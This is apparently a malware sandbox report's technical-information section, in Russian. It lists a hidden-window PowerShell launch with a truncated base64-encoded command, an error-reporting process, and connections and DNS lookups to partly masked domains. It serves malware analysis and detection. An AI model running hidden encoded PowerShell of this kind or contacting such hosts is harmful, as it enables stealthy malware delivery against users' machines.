Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAGsAYgBtAGQAawBsAGwAegBtAHUAaAB5AD0AJwBUAHAAcQBhAGEAdQBtAHcAdQAnADsAJABOAGwAcQB2AG0AeABiAGcAIAA9ACAAJwA5ADEAOQAnADsAJABYAHcAbABxAGQAYgBiAHoAYQA9ACcAWgBjAGkAeABnAGsAagBmAG4AdwA...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3824
- 'ar##63.com':80
- DNS ASK le####grotech.com
- DNS ASK em###mes.com
- DNS ASK se##.#nfoavisos.com
- DNS ASK ar##63.com
- DNS ASK yo###plant.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAGsAYgBtAGQAawBsAGwAegBtAHUAaAB5AD0AJwBUAHAAcQBhAGEAdQBtAHcAdQAnADsAJABOAGwAcQB2AG0AeABiAGcAIAA9ACAAJwA5ADEAOQAnADsAJABYAHcAbABxAGQAYgBiAHoAYQA9ACcAWgBjAGkAeABnAGsAagBmAG4AdwA... (со скрытым окном)